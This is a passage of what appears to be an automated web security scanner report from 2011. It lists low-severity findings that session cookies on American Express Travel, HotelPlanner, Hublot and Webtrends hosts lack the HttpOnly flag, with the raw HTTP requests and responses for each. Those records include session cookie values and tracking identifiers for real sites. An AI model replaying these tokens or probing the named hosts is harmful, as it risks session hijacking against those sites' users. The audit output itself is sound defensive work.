Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:09:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Path=/
Location: https://go.americanexpress-travel.com/hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8

14.19. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /SSOAuthenticateResponse.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SSOAuthenticateResponse.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://axptravel.americanexpress.com/consumertravel/customlogin.do?clientid=ACH-ONLINE&target=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do%3fService%3DAMEX%26leavingDate%3D10%2F04%2F11%26returningDate%3D10%2F07%2F11%26searchMode%3Dcity%26city%3DBoston%2C%2520United%2520States%26cityCountryCode%3D%26hotelName%3D%26adults%3D1%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25EF%25BF%25BDid%26WA4%3D%25EF%25BF%25BDid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot%26SSORequestPath%3D/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=90DF1362B8BE0812CA054723BD79F759.p0716; Path=/
Location: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

14.20. https://go.americanexpress-travel.com/hotel/HotelAvailability.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelAvailability.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelAvailability.do?SEQ=1317600834023922011 HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=14DD10D7D5064DF95146A9A1D7FADBBB.p0716; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Location: https://go.americanexpress-travel.com/hotel/HotelAvailability.do?SEQ=1317600834023922011
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

14.21. https://go.americanexpress-travel.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...
14.22. http://hotelplanner.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hotelplanner.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD / HTTP/1.1
Host: hotelplanner.com
Proxy-Connection: keep-alive
Content-Length: 0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 01:40:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: CFID=60070682;expires=Wed, 25-Sep-2041 01:40:57 GMT;path=/
Set-Cookie: CFTOKEN=53f1015cf5671dc0-C770E694-A4BA-DBE0-02F461142B2FF8C1;expires=Wed, 25-Sep-2041 01:40:57 GMT;path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked

14.23. http://hublotnation.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hublotnation.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; path=/
X-Pingback: http://hublotnation.com/wp/xmlrpc.php
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 28115
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if IE 7 ]><html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="no-js ie8"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="no-js ie9"><![endif]
...[SNIP]...
14.24. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=e1f36dbd085f0041d284; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=019dddd1; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93204194090; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.25. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c